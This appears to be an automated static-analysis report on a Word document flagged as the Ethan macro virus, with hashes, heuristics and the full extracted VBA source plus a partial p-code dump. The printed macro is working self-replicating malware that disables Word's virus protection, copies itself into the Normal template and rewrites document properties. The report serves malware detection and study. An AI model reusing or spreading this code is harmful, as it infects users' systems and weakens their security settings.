Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5356b94f523ec2f3…

MALICIOUS

Office (OLE)

35.0 KB Created: 1999-09-15 22:47:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1a0bac1ae10ae1be2a4cc8874f962e3e SHA-1: c27797114beefef813452ca229312d86e0fddd46 SHA-256: 5356b94f523ec2f3a18ab1aa11a6d73c631d506cabce9726d3cd3ef1b0513451
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an OLE document containing VBA macros. The critical ClamAV heuristic indicates it is known malware (Doc.Trojan.Ethan-1). The VBA script attempts to copy its code to the Normal template and potentially modify document properties, suggesting an attempt at persistence or evasion. The script's logic for copying code between the active document and the Normal template, along with the potential modification of document summary information, indicates a sophisticated evasion or persistence mechanism.

Heuristics 2

  • ClamAV: Doc.Trojan.Ethan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6200 bytes
SHA-256: 1c75c0876b530d2ddef6fd14ebfdf266367bc56d5e313fa5ab50ee236b730d5d
Detection
ClamAV: Doc.Trojan.Ethan-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True






































Private Sub Document_Close()
On Error Resume Next
Const ID = "xyzzy"
Dim hdlskk As Boolean
Dim ijnff, iitgh As Object
Dim zmbbcxx As String
Set ijnff = ActiveDocument.VBProject.VBComponents.Item(1)
Set iitgh = NormalTemplate.VBProject.VBComponents.Item(1)
Options.VirusProtection = False
If (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
If (iitgh.codemodule.Find(ID, 1, 1, 10000, 10000) = False) And (ijnff.codemodule.Find(ID, 1, 1, 10000, 10000) = True) Then
hdlskk = NormalTemplate.Saved
zmbbcxx = ijnff.codemodule.Lines(1, ijnff.codemodule.CountOfLines)
iitgh.codemodule.deletelines 1, iitgh.codemodule.CountOfLines
iitgh.codemodule.AddFromString zmbbcxx
If hdlskk = True Then NormalTemplate.Save
End If
hdlskk = False
If (iitgh.codemodule.Find(ID, 1, 1, 10000, 10000) = True) And (ijnff.codemodule.Find(ID, 1, 1, 10000, 10000) = False) Then
zmbbcxx = iitgh.codemodule.Lines(1, iitgh.codemodule.CountOfLines)
ijnff.codemodule.deletelines 1, ijnff.codemodule.CountOfLines
ijnff.codemodule.AddFromString zmbbcxx
hdlskk = True
End If
If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Ethan Frome": .Author = "EW/LN/CB": .Keywords = "Ethan": .Execute: hdlskk = True: End With
If (hdlskk = True) And Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/19619b8914c7479e8b997d62a9c94c5c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3407 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' 	FuncDefn (Private Sub Document_Close())
' Line #39:
' 	OnError (Resume Next) 
' Line #40:
' 	Dim (Const) 
' 	LitStr 0x0005 "xyzzy"
' 	VarDefn ID
' Line #41:
' 	Dim 
' 	VarDefn hdlskk (As Boolean)
' Line #42:
' 	Dim 
' 	VarDefn ijnff
' 	VarDefn iitgh (As Object)
' Line #43:
' 	Dim 
' 	VarDefn zmbbcxx (As String)
' Line #44:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set ijnff 
' Line #45:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set iitgh 
' Line #46:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #47:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	Paren 
' 	IfBlock 
' Line #48:
' 	Ld ID 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x2710 
' 	LitDI2 0x2710 
' 	Ld iitgh 
' 	MemLd codemodule 
' 	ArgsMemLd Find 0x0005 
' 	LitVarSpecial (False)
' 	Eq 
' 	Paren 
' 	Ld ID 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x2710 
' 	LitDI2 0x2710 
' 	Ld ijnff 
' 	MemLd codemodule 
' 	ArgsMemLd Find 0x0005 
' 	LitVarSpecial (True)
' 	Eq 
' 	Paren 
' 	And 
' 	IfBlock 
' Line #49:
' 	Ld NormalTemplate 
' 	MemLd Saved 
' 	St hdlskk 
' Line #50:
' 	LitDI2 0x0001 
' 	Ld ijnff 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	Ld ijnff 
' 	MemLd codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	St zmbbcxx 
' Line #51:
' 	LitDI2 0x0001 
' 	Ld iitgh 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	Ld iitgh 
' 	MemLd codemodule 
' 	ArgsMemCall deletelines 0x0002 
' Line #52:
' 	
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.